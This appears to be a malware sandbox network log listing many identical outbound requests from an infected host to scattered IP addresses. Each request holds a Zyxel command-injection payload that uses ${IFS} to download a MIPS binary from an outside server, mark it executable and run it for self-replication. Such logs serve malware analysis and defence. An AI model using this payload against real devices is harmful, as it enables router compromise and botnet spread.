                                                Jan 12, 2024 18:24:55.334388971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9323192.168.2.134797499.135.52.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334417105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9324192.168.2.1345676182.113.28.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334435940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9325192.168.2.133512051.196.136.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334487915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9326192.168.2.1342728199.16.194.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334521055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9327192.168.2.134570020.77.86.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334556103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9328192.168.2.1357282175.89.187.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334600925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9329192.168.2.1348056212.115.67.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334626913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9330192.168.2.1349352211.219.25.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334685087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9331192.168.2.1341514161.206.156.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334719896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9332192.168.2.134681435.15.88.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334757090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9333192.168.2.135937872.12.152.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334809065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9334192.168.2.135359070.55.183.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334826946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9335192.168.2.1347594177.74.145.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334875107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9336192.168.2.13330505.233.193.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334917068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9337192.168.2.1354820138.76.237.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334949017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9338192.168.2.1339618131.57.46.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334996939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9339192.168.2.135735091.42.119.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335050106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9340192.168.2.1352148119.50.114.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335078955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9341192.168.2.134680079.199.34.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335112095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9342192.168.2.134540079.99.118.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335134983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9343192.168.2.1335972101.77.155.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335192919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9344192.168.2.1340680172.12.19.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335223913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9345192.168.2.1342954167.69.95.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335264921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9346192.168.2.134966224.196.55.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335319996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9347192.168.2.1345716107.229.93.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335345984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9348192.168.2.1347406117.108.0.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335393906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9349192.168.2.1347456182.27.181.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335448980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9350192.168.2.13391621.180.168.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335479975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9351192.168.2.1356104180.117.220.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335537910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9352192.168.2.134568096.96.171.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335549116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9353192.168.2.133327084.90.212.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335570097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9354192.168.2.1358774185.165.80.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335608959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9355192.168.2.1349512165.28.114.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335679054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9356192.168.2.134105077.189.247.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335717916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9357192.168.2.134584676.122.245.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335745096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9358192.168.2.135167862.109.218.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335781097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9359192.168.2.134745685.33.42.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335798979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9360192.168.2.133389240.1.66.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335824966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9361192.168.2.1341516124.21.39.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335901976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9362192.168.2.1336082203.19.122.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335939884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9363192.168.2.135204882.152.169.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.335975885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9364192.168.2.1360318172.141.141.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336007118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9365192.168.2.135989048.68.25.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336066008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9366192.168.2.1338112157.240.37.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336087942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9367192.168.2.1355292158.255.162.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336132050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9368192.168.2.133384866.69.216.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336191893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9369192.168.2.1342118181.50.118.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336226940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9370192.168.2.1347842116.164.125.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336298943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9371192.168.2.1356016190.61.143.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336323023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9372192.168.2.133580413.13.24.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336354971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9373192.168.2.133583450.186.83.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336388111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9374192.168.2.1359944216.109.133.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336448908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9375192.168.2.1360240205.233.103.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336472988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9376192.168.2.1342258173.234.252.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336529970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9377192.168.2.1356208201.154.45.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336575985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9378192.168.2.1356962144.241.213.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336605072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9379192.168.2.1355380181.224.238.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336622000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9380192.168.2.1341296206.115.2.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336663008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9381192.168.2.1332856125.74.248.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336710930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9382192.168.2.135210840.240.116.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336766005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9383192.168.2.1343278180.35.7.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336791039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9384192.168.2.1350140108.78.170.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336849928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9385192.168.2.135542842.166.177.99443
                                                TimestampBytes transferredDirectionData
